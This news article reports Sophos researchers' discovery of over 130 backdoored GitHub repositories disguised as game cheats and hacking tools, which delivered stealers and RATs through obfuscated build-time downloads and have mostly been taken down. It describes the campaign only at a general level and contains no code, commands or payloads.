A massive cybercrime operation has been uncovered by cybersecurity researchers, revealing a sophisticated scheme that used malicious code to target unsuspecting individuals, including gamers and novice hackers. The operation involved over 130 backdoored repositories on GitHub, disguised as malware tools or game cheats.

The investigation began when a Sophos customer queried the safety of a GitHub-hosted project called Sakura RAT. While the tool itself appeared broken, researchers found it contained a hidden backdoor, targeted not at businesses but at fellow cybercriminals and novice hackers. The code included a "PreBuild" event, which silently downloaded additional malware during compilation.

This was just one clue in what became a deep investigation into weaponized repositories. Sophos analysts traced the email address embedded in the malware, uncovering 141 repositories, 133 of which were backdoored impersonating legitimate projects. The threat actor used automation to maintain the illusion of active development, with repositories filled with thousands of auto-generated commits using GitHub Actions workflows.

Most owners had only a few other projects, and contributor accounts followed strict patterns, suggesting a coordinated structure. Malware was often hosted in GitHub releases or on paste sites, with infection chains hidden in layers of obfuscated code across formats, including PowerShell, Python, JavaScript, and Windows screensavers.

While the final payloads varied, they often delivered known threats like Lumma Stealer or AsyncRAT. Researchers believe many of these projects were seeded across forums and social platforms to lure unsuspecting users into compiling and running the backdoored tools.

Sophos suggests that this operation may be tied to a broader Distribution-as-a-Service (DaaS) model previously reported in 2024. Some code artifacts and infrastructure overlap with past campaigns, but whether the same actor is responsible remains unclear.

To combat this threat, Sophos has reported all known active repositories and paste sites to the relevant platforms. Most have since been taken down. "Ironically, the threat actor seems to predominantly target cheating gamers and inexperienced cybercriminals," said the research team. "It's also worth noting that malware doesn't usually care who it ends up infecting, and so other groups may also have been infected – including people experimenting with open-source repositories out of curiosity."

The incident highlights the need for vigilance among developers and users of open-source projects, particularly on platforms like GitHub. It also underscores the importance of cybersecurity awareness and education in preventing these types of threats.

Key Takeaways:

* Over 130 backdoored repositories were discovered on GitHub, disguised as malware tools or game cheats. * The operation targeted unsuspecting individuals, including gamers and novice hackers. * Sophos reports that most known active repositories and paste sites have been taken down. * The incident may be tied to a broader Distribution-as-a-Service (DaaS) model previously reported in 2024. * Cybersecurity awareness and education are essential in preventing these types of threats.